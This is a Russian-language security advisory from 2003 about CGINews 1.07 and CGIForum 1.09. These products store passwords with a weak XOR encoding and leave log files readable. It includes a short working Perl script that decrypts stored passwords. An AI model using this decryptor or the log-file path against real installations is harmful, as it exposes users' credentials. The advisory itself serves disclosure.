| Дата публикации: | 17.12.2003 |
| Всего просмотров: | 1168 |
| Опасность: | Низкая |
| Наличие исправления: | Частично |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная |
| Воздействие: | Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
CGINews 1.x
CGIForum 1.x |
| Уязвимые версии: CGINews 1.07 и CGIForum 1.09
Описание: Уязвимость обнаружена в CGINews и CGIForum. Локальный пользователь может расшифровать пароли. Удаленный пользователь может просматривать журналы регистрации. Пароли пользователей в *.pwl файлах закодированы слабым алгоритмом шифрования, который легко может быть взломан локальным пользователем. Удаленный пользователь может читать лог файлы на сервере в конфигурации по умолчанию, используя следующий формат: username/username.log Пример/Эксплоит:
print "CGI News 1.07 - Pass Decrypt Utility \n";
print "------------------------------------ \n";
print "By JeiAr [ http://www.gulftech.org ] \n";
print "\n" x 3;
print "Please Enter Encrypted Pass:";
$UserPassword = <STDIN>;
chomp $UserPassword;
$UserPassword = EncDec($UserPassword);
print "\n" x 5;
print "Encrypted Pass Is: $UserPassword";
sub EncDec
{
my @args = split //, shift();
my $retval = '';
for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) {
$retval .= chr(ord($args[$stringpos]) ^ 0x12);
}
return $retval;
}
exit;
URL производителя: http://triskam.virtualave.net/cginews.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Issues In CGINews and CGIForum |